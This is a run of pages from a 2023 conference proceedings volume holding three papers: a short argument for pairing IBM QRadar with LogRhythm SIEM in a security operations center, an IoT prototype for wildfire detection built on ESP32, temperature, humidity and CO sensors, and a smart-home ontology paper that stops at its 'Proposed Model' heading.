regardless of their criticality. So the question that arises is how to secure the critical data in these critical infrastructures against attacks such as ransomware or phishing attacks in order to ensure the security of the information system? Keywords: IS · Security · Attacks · Infrastructure · Vulnerability · Critical

1 Introduction Recently, remote-working, the porosity of information systems that accompanies it, 5G, the proliferation of connected objects, the increased use of artificial intelligence are © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 199–204, 2023. https://doi.org/10.1007/978-3-031-35251-5_18

200

Y. E. Barhami et al.

elements that have encouraged hackers to develop their skills in terms of vulnerability research in IS since companies are still looking for the the vulnerabilities of their systems and securing them. However, despite the power of today’s security tools, the number of attacks has increased in recent years by a very large percentage. Referring to data from the National Agency for the Security of Information Systems (Anssi), the firm recalls that the number of ransomware attacks has increased threefold or fourfold in one year, with 128 attacks having been listed on September 30, 2020 against 54 throughout 2019. Here we present a basic class of attacks that can be a cause of slow network performance, uncontrolled traffic, viruses, etc. Attacks can be classified into two categories “Passive” when a network intruder intercepts data circulating on the network, and “Active” in which an intruder issues commands to disrupt the normal operation of the network. So, let’s go back to the main question mentioned in the abstract, how to secure an information system against these threats? First, it is necessary to target the important elements to be secured in a critical infrastructure, such as [2]: A. Data Privacy: Privacy is the ability to conceal messages from a passive attacker so that any message communicated over the network remains confidential. This is the most important issue when it comes to network security. B. Data authentication: Authentication ensures the reliability of the message by identifying its origin. Attacks in sensor networks don’t just involve packet tampering; opponents can also inject additional fake packets. Authentication verifies the identity of senders and recipients. C. Data Integrity: Data integrity is necessary to ensure the reliability of the data and refers to the ability to confirm that a message has not been tampered with, modified or changed. Even if the network is confidential, it is still possible that the integrity of the data has been compromised by changes. D. Data Availability: Availability determines whether a node has the capacity to use resources and whether the network is available for messages to communicate. However, failure of the base station or cluster leader availability will eventually threaten the entire network. Once the target points are dictated, we can move on to solutions for the protection of the IS of critical infrastructures against threats. Any company with an information system is obviously equipped with: workstations, servers, switches (level 2 & 3), routers, storage servers, a DMZ zone… Etc. So to secure the local network against the external network, the IS must have a proxy powerful enough to check the incoming and outgoing internet traffic and a new generation firewall intelligent enough to handle all the internet and applicatif traffic. Despite the availability of these two elements, critical infrastructures are still vulnerable to challenges, zero-days, and new types of attacks whose intelligence improves over time. It must have a 24/7 monitoring system to monitor all information system (IS) activities and deduce events that could turn into security incidents requiring special care.

From Firewall and Proxy to IBM QRadar SIEM

201

To answer the main question: the solution is to have a Security Operation Center (SOC) to monitor critical and important traffic using a tool SIEM [3].

2 SIEM IBM QRADAR Security Information Event Management (SIEM) has been defined as a software solution that ensures the information security of an information system. However, SIEM is defined as a set of security software tools that includes the following systems: • • • • •

Log collection and analysis Log Transfer in a standard format Security threats notification Security incident detection Incident response workflow

Basically, the role of SIEM,; it is to be able to collect from all the security tools and from all the critical equipments such us: Anti-virus, anti-spam, WAF, routers, switchs level 3, ms-exchange, AIX,.. etc. the logs and be able to correlate them and display them on a console 24 h a day following the implemented personalized rules. An intrusion rules setting is required in this sense to generate an alert from the SIEM depending on the context. Now, it remains to choose the most efficient and suitable SIEM solution for the IS of a critical infrastructure. According to Gartner’s Magic Quadrant published in 2018, the leader in SIEM solutions remains the IBM QRADAR (Fig. 1): IBM Security™ QRadar® Security Information and Event Management (SIEM) helps security teams detect, prioritize, and respond to threats across the enterprise. The solution automatically analyzes and aggregates log and feed data from thousands of devices, endpoints, and applications on your network, and provides unique alerts to accelerate incident analysis and resolution. QRadar SIEM is available for on-premises and cloud environments. This solution has several highly developed features such as: • • • • •

Visibility of all Windows, Linux, Unix environments. Etc Real-time threat detection Prioritized automated triage of alerts received regarding IS vulnerability points Policy-preconfigured compliance content for intrusion detection Faster response to threats

These various features are applied following the architecture designed for the QRadar composed of 4 modules: • QRadar Console: allows the visualization of results • QRadar Event Collector: Collects, normalizes and restructures received logs according to the recommended format.

202

Y. E. Barhami et al.

Fig. 1. IBM QRadar - the leader of SIEM-solutions (integrity.com.ua)

• QRadar Event Processor: Processes logs received by QRadar Event Collector using predefined engine rules to generate alerts. • QRadar QFlow Collector: Plays the same role as QRadar Event Collector but for real-time data such as network traffic picks up. • QRadar Flow Processor: Plays the same role as QRadar Event Processor but processes data received from QRadar QFlow Collector. • QRadar Data Node: Add additional storage and analytics capabilities as needed. Here is an example diagram to imagine the architecture of the solution (Fig. 2): QRadar also manages the Big Data aspect through the QRadar Module Data Node, which allows you to add as many nodes as necessary to manage the number of logs received. Our SIEM will also benefit from this advantage as well as by its distribution architecture composed of a master server and several slave servers than by the Big Data platform adopted. A load sharing tool in RAM will also be used to avoid losing data in case of congestion. QRadar is a commercial SIEM billed to the number of events received per second (EPS), when this number is exceeded the data is stored in the QRadar Collector Module event queue until the throughput is decreased. However, if this is exceeded and the queue is filled, the system deletes the events and QRadar notifies it. This remains a major problem, because the deletion of events can cause the deletion of logs or generate errors on source logs that can have the impact of ignorance of malicious traffic that requires immediate intervention.

From Firewall and Proxy to IBM QRadar SIEM

203

Fig. 2. Brain Book: QRadar SIEM ARCHITECTURE (https://arfanahmedcheema.blogspot.com)

QRadar is intended for large companies because its acquisition cost is too expensive. Having a high EPS to reduce load saturation and lead to the deletion of logs is also expensive, where does the problem of this topic come from: How to avoid exceeding the EPS threshold by putting a cheaper network architecture? The answer about that question is the value that I come with to the topic. After a long reseach, I found the existence of a data plans for security information and event management (SIEM) products in the information security space. However, the word “unlimited” appears not to have an agreed upon definition across vendors. In fact, other vendors have a restrictive view on “unlimited” data plans. But not LogRhythm. At LogRhythm [6], unlimited data enables you to have limitless data collection and processing for the life of your term—no matter how much your organization grows. For complete visibility and protection, you can manage and monitor all of your data And as your organization grows, you don’t have to worry about budget constraints or update licenses that force you to choose which data you can and can’t protect. LogRhythm gives you the ability to better protect your organization with the Unlimited Data Plan at a fixed cost. So, the solution is to deploy another SIEM that has unlimited EPS and data to collect, correlate and centralize logs. Sending to Qradar will be limited on alerts only. The main benefits of this solution are: • No limitation on EPS consumption • Reduced storage consumption

References 1. https://www.babs.admin.ch/fr/aufgabenbabs/ski/kritisch.html 2. Microsoft Word - 20070913 IJCSIS Camera Ready Paper.doc (arxiv.org)

204 3. 4. 5. 6.

Y. E. Barhami et al.

International Journal of Soft Computing and Engineering (researchgate.net) IBM QRadar - the leader of SIEM-solutions (integrity.com.ua) Brain Book: QRadar SIEM ARCHITECTURE arfanahmedcheema.blogspot.com https://logrhythm.com/blog/the-only-unlimited-siem-data-plan-in-town/

IoT-Based Approach for Wildfire Monitoring and Detection Mounir Grari1(B) , Idriss Idrissi1 , Mohammed Boukabous1 , Mimoun Yandouzi2 , Omar Moussaoui1 , Mostafa Azizi1 , and Mimoun Moussaoui1 1 MATSI, UMP, Oujda, Morocco

[email protected] 2 LARI, UMP, Oujda, Morocco

Abstract. Wildfires are unpredictable and dangerous events that have the potential to cause great damage and loss of life. Wildfires are very dangerous and can spread quickly, often burning thousands of acres of land. Many people and animals are killed or injured because of wildfires every year. Forest wildfires are particularly difficult to predict and monitor, especially in remote areas. However, with the help of the internet of things (IoT), fire officials can use data collected from remote sensors to identify the potential of fire, predict its trajectory, and even issue alerts to those in the fire’s path. By using IoT, fire officials can create a more effective response plan and save lives and properties. In this paper, we propose an IoT-based solution to detect and monitor wildfires. This approach consists to deploy an architecture of IoT devices in the forest, such as sensors of temperature and humidity. To this end, we develop an IoT device model intending to provide a proof of concept for this scheme. Keywords: Wildfires · Forest Fire · Internet of Things (IoT) · Sensors

1 Introduction Forests are planet protectors in terms of their ecological balance. Sadly, most forest fires are only found after they have spread over large swaths of land, meaning it is difficult, if not impossible, to manage and extinguish them occasionally [1]. Humanmade wildfires that spring out in rural regions with combustible vegetation often occur either accidentally or deliberately lit. Wildfires affect transportation, communications, electricity, gas services, and water supply, not to mention other areas of study. They may destroy the quality of the air, cause property damage, harm crops, exhaust resources, endanger animals, and harm humans. The last devastating wildfire was in Turkey where more than a hundred fires erupted across the country, killing numerous people, including firefighters combating the blazes [2]. Scientists believe that global warming is helping the flames that are burning in the sweltering summer heat [3]. Using cutting-edge technologies, we can devise novel methods for detecting and monitoring forest fires in their early stages and spread. Elaborate sensors have made it easier to detect forest fires in progress [3–8]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 205–213, 2023. https://doi.org/10.1007/978-3-031-35251-5_19

206

M. Grari et al.

The broad deployment of sensors and intelligent IoT systems has the potential to change the monitoring and detection of wildfire approaches. Wireless sensor networks (WSN) can be also used for continuous monitoring of the environment and for timely detection of potential fire hazards. The advancement of IoT has led to the development of new applications and services [9] that can be used efficiently to predict and monitor events such as wildfires. For instance, IoT devices with sensors of temperature and humidity are more convenient to predict the likelihood of a wildfire. Other sensors such as those for light, carbon monoxide, and oxygen levels can also be exploited to improve wildfire predictions. WSNs are composed of spatially distributed autonomous IoT devices that can collect and exchange data with minimal human intervention. Low-power wide-area networks (LPWANs), such as LoRaWAN, are suitable for connecting large numbers of sensors and are widely used to send data over long distances. The combination of IoT and LPWANs shows promise for improving the accuracy and timeliness of wildfire detection. For example, aerial thermal images allow detecting eventually hot spots that may indicate the start of a wildfire. However, the use of aerial images is not always possible, due to weather conditions or the remoteness of the area. In these cases, data from ground-based sensors can create a more complete picture of the situation. Data collected from sensors can be processed and analyzed to identify patterns that may indicate the start of a wildfire. By using data from multiple sources, including thermal images, smoke detectors, and weather sensors, it is possible to detect wildfires with a high degree of accuracy [10]. In this paper, we propose an IoT-based methodology for detecting and monitoring wildfires. To demonstrate the feasibility of this strategy, we have designed an IoT device that includes sensors such as temperature, humidity, and carbon monoxide. The rest of the paper is structured as follows: In the second section, we review the background of the used technology. Following, related works are presented in the third section. Our proposed methodology is described in section four. Before concluding, the fourth section discusses our obtained results.

2 Background 2.1 Internet of Things The IoT refers to devices with embedded sensors that can transmit data and, in some cases, be controlled remotely. Smart thermostats and remote control lighting fixtures are common examples, but many others are ranging from traffic sensors to water quality meters to smart grid components to track manufactured goods and vehicle fleets all over the world [11]. The number of standards, instruments, projects, policies, frameworks, and organizations vying to define how advanced connected devices communicate grows as the IoT grows [12]. Open-source and open standards will become increasingly important for devices to interconnect properly and for the back end to process the vast amounts of big data that all of these devices will generate [13, 14].

IoT-Based Approach for Wildfire Monitoring and Detection

207

2.2 Sensors DHT22 Sensor. The DHT22 (also called AM2302) sensor is a digital temperature and humidity sensor. The temperature (resp. Humidity) readings are accurate to within 0.5 °C(resp. 2–5%) [15]. The sensor communicates using a digital I2C (Inter-Integrated Circuit Bus) interface and consumes very little power, making it ideal for battery-powered applications. It is a small surface mount device with dimensions of 1.5 mm × 2.5 mm [16]. MQ7 Sensor. The MQ7 is a sensor that detects the amount of carbon monoxide in the air. We use it within things like fire detectors, gas leak detectors, and breathe analyzers. The MQ7 is a semiconductor sensor that detects carbon monoxide using a metal-oxidesemiconductor field-effect transistor (MOSFET). The MOSFET is used to generate a voltage that is proportional to the amount of carbon monoxide present in the air [17]. It is necessary to perform sensor calibration in order to verify that the measurement findings are accurate and consistent with those of other equipment. Based on the environment comparative scale used to test the system, multiple test scenarios are performed to calibrate the sensor.

2.3 LoRaWAN LoRaWAN is a low-power long-range wireless network technology designed for IoT devices. It operates at an unlicensed frequency of 915 MHz and has a range of up to 10 km, making it ideal for connecting devices in rural or remote areas. LoRaWAN is also energy-efficient, allowing devices to operate for years on a single battery charge [18]. It is ideal for applications like building monitoring, smart agriculture, and asset tracking. 2.4 ESP32 The ESP32 is a low-cost and low-power 32-bit Wi-Fi and Bluetooth microcontroller. It has a dual-core processor and integrates an antenna switch, RF balun, power amplifier, low-dropout regulator, and crystal oscillator. It also includes 4 MB of SPI Flash, and supports a lwIP (lightweight IP) stack that includes a full TCP/IPsuite. The ESP32 can be used to create a wide range of applications such as wireless communication, home automation, and smart devices [19]. 2.5 MQTT MQTT (Message Queuing Telemetry Transport) is a machine-to-machine (M2M) messaging protocol that allows devices to communicate in a lightweight pub-sub manner. It is a lightweight publish/subscribe messaging transport protocol. We can use it to connect IoT things, wearable devices, smart sensors, embedded systems, and other M2M equipment. The topics are “subscribed” by the devices, and when they publish a message, it is broadcasted to all devices that have subscribed to that topic [20]. MQTT is an ideal transport protocol for IoT applications in which devices may need to publish status updates or receive updates about changes in the environment [21].

208

M. Grari et al.

3 Related Work The problem of fire detection has been addressed in two different ways, namely classification [22–25] and regression [26]. [22] used a ZigBee-based WSN to collect CO, CO2, smoke concentration, air temperature, relative humidity, and GPS position with a CC2430 map, and the retrieved data is saved on a remote server. [23] used a nearly identical architecture, with an IRIS XM2110 card collecting only three data points: light, temperature, and sound. [24, 26] based their work on an IoT architecture that includes Wi-Fi and an Arduino board, by connecting the Bolt module to the Arduino board, while [24] captured temperature and humidity, soil moisture, pressure, altitude, and GPS position in BOLT Cloud. In contrast, [26] attempted to predict post-fire air pollution levels (forecasting three different air pollution levels such as CO, NH3, and O3), and the Cloud solution used was Microsoft Azure, and [25] collects temperature, humidity, light intensity level, and CO level using an Arduino nano equipped with a wireless radio communication module nrf24L01 and a GSM module SIM800, their proposed server-side solution consists of a PC and an Arduino nano board also equipped with the same communication modules. Diverse sensors are used by researchers, as seen in the following related works [22– 34], however, the most frequent sensors are temperature (86%), Humidity (79%), and CO (36%). These results served as the foundation of our proposed methodology.

4 Proposed Methodology Our proposed IoT prototype is going to have several sensors built into it, and it is going to be attached to trees so that it is out of reach of both animals and people. However, it is going to be able to collect the most data possible while providing the most coverage possible. After these sensors collect data on temperature, humidity, CO concentration, and other relative measurements, it sends it via Lora to the fog gateway (based on the related works [22–36]). The gateway is intended to be placed in a high place in order to receive and send data to and from IoT devices without obstacles. Data is then processed by the gateway and sent to the cloud using the lightweight MQTT protocol and the 2G, 3G, 4G, or satellite for further analysis, storage, and dashboarding (see Fig. 1). 4.1 Proposed Prototype The DHT22 sensor (temperature and humidity sensors) and the MQ7 sensor (CO sensor) are the two primary sensors in our proposed prototype (we can extend the sensing with any relevant ones such as soil humidity or others). The ESP32 microchip uses these two sensors as input sources (based on the related works [22–27, 31–33]). It receives data from them, then sends an MQTT telemetry to the fog node, and in case of an abnormal situation (high temperature, gas detection, and reduced humidity) it sends an urgent warning to authorities. This is a quicker method for determining whether a fire is likely to break out. In this fire detection system, both DHT22 and MQ7 are used to identify the possibility of a wildfire, and the data is then analyzed on the ESP32. Fire departments and authorities will be alerted if the temperature reaches a certain threshold. As a result, the risk of more casualties is reduced by making it simpler for firefighters to deal with fires and perform rescues if needed.

IoT-Based Approach for Wildfire Monitoring and Detection

209

Fig. 1. Proposed methodology for monitoring and detection of Wildfire using IoT

5 Results and Discussions A simulation of a real fire in an open space was set up to demonstrate the applicability of our approach. The simulation is used to assess the feasibility of using IoT for fire detection. At this phase, the sensors have been calibrated in the actual environment (forest and open space in our case). Based on the tests conducted in a realistic environment, we conclude that the sensor readings can work according to predetermined requirements (we performed multiple tests at various distances and heights to the fire), where the device successfully sends a telemetries message (see Fig. 2). The received readings are presented in a dashboard, (we tested a variety of opensource IoT platforms such as ThingSpeak [37], ThingsBoard [38], NodeRed [39], …). The readings from data sensors can be seen in a dashboard (see Fig. 3). This dashboard presents readings from temperature, humidity, and CO sensors. The temperature sensor reading is at the top of the dashboard, followed by the humidity sensor reading, and then the CO sensor reading. The temperature sensor measures the air temperature. The humidity sensor measures the amount of water vapor in the air. The CO sensor measures the level of carbon monoxide in the air. Generally, the higher the humidity, the lower the air temperature will be. The higher the CO level, the more dangerous it is. (The meaning of this sentence is not clear). And the location of the IoT device (prototype) is presented to help better locate the deployed devices. The dashboard can be used to monitor the performance of the data sensors in near real-time. The dashboard can also be a useful tool to detect any anomalies in the data collected from data sensors. From the previous results, we showed that IoT devices can be used to monitor many different factors that are associated with wildfires. This can be extended using other sensors, for example:

210

M. Grari et al.

Fig. 2. Simulation of a real fire

Fig. 3. Wildfires IoT platform dashboard

• IoT devices can be used to monitor the moisture content of the soil, the temperature of the air, the wind speed and direction, the amount of precipitation, and the amount of vegetation in the area. • IoT devices can also be used to monitor the behavior of firefighters; the location of firefighters can be tracked using GPS sensors. This data can be used to help officials plan and coordinate the response to a wildfire.

IoT-Based Approach for Wildfire Monitoring and Detection

211

• IoT devices can also be used to predict the spread of a wildfire; data collected by IoT devices can be used to create a map of the area that is affected by the wildfire. This data can help officials to plan and coordinate the response to a wildfire. From the previous, we can conclude that IoT devices have many potentials uses for monitoring and predicting wildfires. The use of IoT devices is growing rapidly, and the technology is becoming more and more affordable. Officials should consider using IoT devices to help monitor and predict wildfires [40].

6 Conclusion Generally, the majority of forest fires are detected after having burnt large sections of land and caused considerable property damage, agricultural loss, resource depletion, animal harm, as well as human injury or death. Several experts believe that the blazing summer heat is facilitating the spread of fire. A variety of sensors, including those of temperature and humidity, could be used to better anticipate wildfires and mitigate their effects. We proposed an IoT-based approach to identify and monitor wildfires, and we validate it through a small prototype. According to the findings of the study, our approach has the potential to be deployed for detecting a forest fire and determining its location. The IoT strategy may be applied broadly in forests, across the world, to assist firefighting authorities in dealing with catastrophes more efficiently, therefore protecting lives and properties. IoT-based wildfire detection and monitoring have limitations. The approach relies heavily on sensors and other technology installed in advance. This limits its effectiveness in remote or hard-to-reach areas. Second, installing and maintaining necessary infrastructure can be prohibitively expensive, especially for smaller forest services. Finally, the accuracy of the sensor and other technology data is often affected by weather and terrain. To address these limitations, our future work will concentrate on developing more effective and affordable sensors and other technology for detecting and responding to wildfires. Furthermore, efforts will be made to improve the accuracy of data collected by IoT-based systems in order to make them more reliable and trustworthy.

References 1. World Health Organization Wildfires. https://www.who.int/health-topics/wildfires. Accessed 3 Oct 2020 2. Turkey wildfires: “The animals are on fire,” say devastated farmers as wildfires sweep Turkey - CNN. https://edition.cnn.com/2021/07/31/world/turkey-wildfires-manavgat-six-dead-intl/ index.html. Accessed 3 Aug 2021 3. Alkhatib, A.A.A.: A Review on Forest Fire Detection Techniques (2014). https://doi.org/10. 1155/2014/597368 4. Kumar, A., Gaur, A., Singh, A., et al.: Fire sensing technologies: a review. IEEE Sens J 19, 3191–3202 (2019). https://doi.org/10.1109/JSEN.2019.2894665 5. Gaur, A., Singh, A., Kumar, A., Kumar, A., Kapoor, K.: Video flame and smoke based fire detection algorithms: a literature review. Fire Technol. 56(5), 1943–1980 (2020). https://doi. org/10.1007/s10694-020-00986-y

212

M. Grari et al.

6. Bu, F., Gharajeh, M.S.: Intelligent and vision-based fire detection systems: a survey. Image Vis. Comput. 91, 103803 (2019). https://doi.org/10.1016/J.IMAVIS.2019.08.007 7. Yuan, C., Zhang, Y., Liu, Z.: A survey on technologies for automatic forest fire monitoring, detection, and fighting using unmanned aerial vehicles and remote sensing techniques. 45, 783–792 (2015). https://doi.org/10.1139/CJFR-2014-0347 8. Allison, R.S., Johnston, J.M., Craig, G., Jennings, S.: Airborne optical and thermal remote sensing for wildfire detection and monitoring. Sensors 16, 1310 (2016) . https://doi.org/10. 3390/S16081310 9. Idrissi, I., Azizi, M., Moussaoui, O.: IoT security with Deep Learning-based Intrusion Detection Systems: A systematic literature review. In: 4th International Conference on Intelligent Computing in Data Sciences, ICDS 2020. Institute of Electrical and Electronics Engineers (IEEE), pp. 1–10 (2020) 10. Berrahal, M., Azizi, M.: Augmented binary multi-labeled CNN for practical facial attribute classification. Indones J. Electr. Eng. Comput. Sci. 23, 973–979 (2021) 11. Idrissi, I., Azizi, M., Moussaoui, O.: Accelerating the update of a DL-based IDS for IoT using deep transfer learning. Indones J Electr Eng Comput Sci 23, 1059–1067 (2021). https://doi. org/10.11591/ijeecs.v23.i2.pp1059-1067 12. Hammoudi, Y., Idrissi, I., Boukabous, M., et al.: Review on maintenance of photovoltaic systems based on deep learning and internet of things. Indones J. Electr. Eng. Comput. Sci. 26 (2022) 13. Boukabous, M., Azizi, M.: Review of learning-based techniques of sentiment analysis for security purposes. In: Innovations in Smart Cities Applications vol. 4, pp 96–109. Springer, Cham (2021) 14. Boukabous, M., Azizi, M.: A comparative study of deep learning based language representation learning models. Indones J. Electr. Eng. Comput. Sci. 22, 1032–1040 (2021). https:// doi.org/10.11591/ijeecs.v22.i2.pp1032-1040 15. DHT11 & DHT22 Sensors Temperature using Arduino - Arduino Project Hub. https://cre ate.arduino.cc/projecthub/MinukaThesathYapa/dht11-dht22-sensors-temperature-using-ard uino-b7a8d6. Accessed 21 Dec 2021 16. Uiversitatis A, Series C-T: How To Use The DHT22 Sensor For Measuring Temperature And Humidity With The Arduino Board. LXVIII (2016). https://doi.org/10.1515/aucts-2016-0005 17. Ferdousi, J.A., Ananto, S.E., Ahmed, M.N.: Development of Carbon Monoxide detecting device using MQ-7 sensor along with its statistical analysis (2014) 18. Haxhibeqiri, J., De Poorter, E., Moerman, I., Hoebeke, J.: A survey of LoRaWAN for IoT: from technology to application. Sensors 2018 18, 3995 (2018). https://doi.org/10.3390/S18 113995 19. Idrissi, I., Mostafa Azizi, M., Moussaoui, O.: A lightweight optimized deep learning-based host-intrusion detection system deployed on the edge for IoT. Int. J. Comput. Digit. Syst. 11, 209–216 (2022). https://doi.org/10.12785/ijcds/110117 20. MQTT - The Standard for IoT Messaging. https://mqtt.org/. Accessed 12 Aug 2021 21. Soni, D., Makwana, A.: A Survey On MQTT: A Protocol Of Internet Of ThinGS (IOT) MPIndex View project Analysis and Survey on String Matching Algorithms for Ontology Matching View project A SURVEY ON MQTT: A PROTOCOL OF INTERNET OF THINGS(IOT) (2017) 22. System, N.M.: Real-Time Identification of Smoldering and Flaming Combustion Phases in Forest Using a Wireless Sensor. (2016). https://doi.org/10.3390/s16081228 23. Pokhrel, P., B HS: Advancing Early Forest Fire Detection Utilizing Smart Wireless Sensor Networks. Springer International Publishing (2018) 24. Zope, V., Dadlani, T., Matai, A., et al.: IoT sensor and deep neural network based wildfire prediction system. In: Proceedings of the International Conference on Intelligent Computing and Control Systems, ICICCS 2020, pp 205–208 (2020)

IoT-Based Approach for Wildfire Monitoring and Detection

213

25. Dampage, U., Bandaranayake, L., Wanasinghe, R., Kottahachchi, K.: Forest fire detection system using wireless sensor networks and machine learning. Sci. Rep., 1–11 (2022). https:// doi.org/10.1038/s41598-021-03882-9 26. Mani, G., Volety, R.: A comparative analysis of LSTM and ARIMA for enhanced real-time air pollutant levels forecasting using sensor fusion with ground station data. Cogent Eng. 8 (2021). https://doi.org/10.1080/23311916.2021.1936886 27. Liew, J.T., Sali, A., Noordin, N.K., et al.: Sustainable Peatland Management with IoT and Data Analytics (2021) 28. Imran, I.N., Ahmad, S., Kim, D.H.: Towards mountain fire safety using fire spread predictive analytics and mountain fire containment in iot environment. Sustain 13, 1–23 (2021). https:// doi.org/10.3390/su13052461 29. Patil, S.S., Vidyavathi, B.M.: A machine learning approach to weather prediction in wireless sensor networks. Int. J. Adv. Comput. Sci. Appl. 13, 254–259 (2022). https://doi.org/10. 14569/IJACSA.2022.0130131 30. Zhang, T.: Faulty Sensor Data Detection in Wireless Sensor Networks Using Logistical Regression. (2017). https://doi.org/10.1109/ICDCSW.2017.37 31. Patel, Y.S., Banerjee, S., Misra, R., Das, S.K.: Low-latency energy-efficient cyber-physical disaster system using edge deep learning. In: PervasiveHealth: Pervasive Computing Technologies for Healthcare (2020) 32. Garg, S., Ahuja, S., Randhawa, S.: Real time adaptive street lighting system (2020) 33. Negara, B.S., Kurniawan, R., Nazri, M.Z.A., et al.: Riau forest fire prediction using supervised machine learning. J. Phys. Conf. Ser. (2020) 34. Sharma, R., Rani, S., Memon, I.: A smart approach for fire prediction under uncertain conditions using machine learning. Multimed. Tools Appl. 79(37–38), 28155–28168 (2020). https://doi.org/10.1007/s11042-020-09347-x 35. Idrissi, I., Boukabous, M., Azizi, M., et al.: Toward a deep learning-based intrusion detection system for IoT against botnet attacks. IAES Int. J. Artif. Intell. 10, 110–120 (2021). https:// doi.org/10.11591/ijai.v10.i1.pp110-120 36. Idrissi, I., Azizi, M., Moussaoui, O.: A stratified IoT deep learning based intrusion detection system. In: 2022 2nd International Conference on Innovative Research in Applied Science, Engineering and Technology (IRASET). IEEE, pp. 1–8 (2022) 37. IoT Analytics - ThingSpeak Internet of Things. https://thingspeak.com/. Accessed 21 Dec 2021 38. ThingsBoard - Open-source IoT Platform. https://thingsboard.io/. Accessed 14 Aug 2021 39. Node-RED. https://nodered.org/. Accessed 21 Dec 2021 40. Yandouzi, M., Grari, M., Idrissi, I., et al.: Literature review on forest fires detection and prediction using deep learning and drones. J. Theor. Appl. Inf. Technol. (2022)

A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home Mohamed El Hamdouni(B) , Yasser Mesmoudi, and Abderrahim Tahiri National School of Applied Sciences of Tetouan, Tetouan, Morocco [email protected], {ymesmoudi,t.abderrahim}@uae.ac.ma

Abstract. The Smart Home is a residence equipped with computer technology that assists its inhabitants in the various situations of domestic life by trying to optimally manage their comfort and safety by action on the house. The detection of abnormal situations is one of the essential points of a home monitoring system. These situations can be detected by analyzing the primitives generated by the audio processing floors and by the apartment’s sensors. We propose in this paper a Inference and decision-making model based on a high-level ontology. Keyword: Decision · ontology · smart home

1 Introduction A Smart Home is a residence equipped with computer technology that assists its inhabitants in the various situations of domestic life by trying to manage optimally their comfort and safety by action on the house. Detection of Abnormal situations is one of the essential points of a home monitoring system. These situations can be detected by analyzing the primitives generated by the audio processing and by the sensors of the apartment. For example, the detection of screams and dull noises (fall of a heavy object) in a reduced time interval allows to infer the occurrence of a fall. Some knowledge about the apartment and the inhabitant can be specified with an ontology. It is a formal representation of knowledge through concepts belonging to a field but also to their relationships; instances of these concepts can also be specified to make inferences about domain properties. The main advantages of an ontology are a standard vocabulary for describing the field and the ease of making changes in the content when necessary. Among the knowledge that can be specified, we can mention for example the location of rooms in the apartment, location of sensors, features of the person (age, impairments, preferences). Ontology can also be used to make an abstraction of information to logical elements that are used for the context recognition. In this article we will describe a state of the art of pre-exixtant ontologies and we will propose a high-level ontology.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 214–219, 2023. https://doi.org/10.1007/978-3-031-35251-5_20

A Decision-Making Model Based on a High-Level Ontology

215

2 Ontology Context and Smart Home McCarthy (1993) presents context as a set of abstract mathematical entities with properties useful for the logical applications of artificial intelligence. However, the term context is used in computer science with a meaning that may vary depending on the field of application. For example, in Natural Language Processing (NLP), the notion of context is different from that used in the field of human-machine interfaces. In addition, it should be noted that not only is there a definition specific to each domain, but it is also possible to find more than one definition of context for the same domain. Nevertheless, we can say that, in any case, context is associated with the interpretation of an entity and its meaning; for example, with regard to the interpretation of a word in NLP, a word can have several meanings, and its interpretation depends on the context (given by the sentence) in which it is located. In the context of ambient intelligence, context was initially limited to specific information such as location (Schilit et al., 1994; Brown et al., 1997). Then, other elements were added such as orientation, user emotional state and date (Dey, 1998). On the other hand, simply defining the context from a list of information is too restrictive because there are circumstances where the elements in play might not belong to this definition. The definition of the concept that seems to us the most relevant in the state of the art is that given by Dey (2001): The context is any information that can be used to characterize the situation of an entity 10. An entity can be a person, place, or object that is considered relevant to the interaction between the user and the application. We find this definition more general and better suited to our research. Indeed, context is always associated with a situation in which it is necessary to reduce ambiguity, and context is not applicable only if a situation is likely to have several interpretations. In addition, the context does not contain all the information available for the system, but only a subset that is useful for disambiguation. The information composing the context is not the same in all cases, it changes when the situation evolves; thus, for example, time could be the most important element of context in one situation and be completely insignificant in another. However, Abowd et al. (1999) and Ryan et al. (1997) have identified as the most important elements in characterizing the situation of an entity: – time, – location, – activity, – and identity of the person. These elements relate to the essential aspects of the context described by Schilit and Theimer (1994): – “Where are you?”, – “Who are you with?”, – “What resources do you have?”. In addition, an app that uses context needs to know when, and what (what the person is doing) to determine why a situation occurred. In this research work, we will use the same elements to compose the context, except the identity of the person which is not important since we assume the presence of a single person in the environment. However, the importance of each element of context will depend on the situation to be assessed.

3 Related Work Chen et al. propose COBRA-ONT for smart spaces. They describe places using with two kinds of places with different constraints. There are also agents such as human and software, which are located in places and play certain roles toper form some activities.

216

M. El Hamdouni et al.

An important contribution is the broker architecture proposed by the authors, which can be used to acquire and reason over contextual information from mobile devices in order to reduce the burden of developers. Since in IoT applications, the concept of a location may vary from appoint to a place of interest, COBRA-ONT is one of the most promising ontologies to represent the location context of “things”. It not only can describe a point but also be used to specify a place using a ‘string’ value for a location. To further correlate contextual information with location, Kim et al. propose an ontology based on the information provided by mobile device sensors, both - physical (WiFi, Bluetooth, etc.) and virtual (e.g., user schedule, web-logs, etc.) to support context-aware services. The proposed ontology defines the relations between different user locations and the contexts identified. The authors further propose a reasoner upon this ontology and evaluate it to identify locations. The result shows that their reasoner has higher location accuracy than the GPS locations. Several domain-specific ontologies have been proposed for defining contextual information as the contexts inferred from sensor data may vary largely based on the domain. For example, in a university domain, the activities may belimited to only a small subset such as reading, playing, sleeping, etc., while in asmart-home, a large set of activities (cooking, cleaning, reading, sleeping, etc.) may be encompassed. In this section, we will limit our study to context-aware ontologies in the domain of smart-homes and activity recognition. Smart-home technologies are now being developed to assist disabled and elderly individuals with dignified living. Okeyo et al. propose an ontology to semantically label the Activities of Daily Living(ADL) such as cooking food, brushing teeth, etc. for the smart-homes domain. Their ontology is based on dynamic segmentation of sensor data for variable time windows to identify simple user activities.

4 Proposed Model

A Decision-Making Model Based on a High-Level Ontology

217

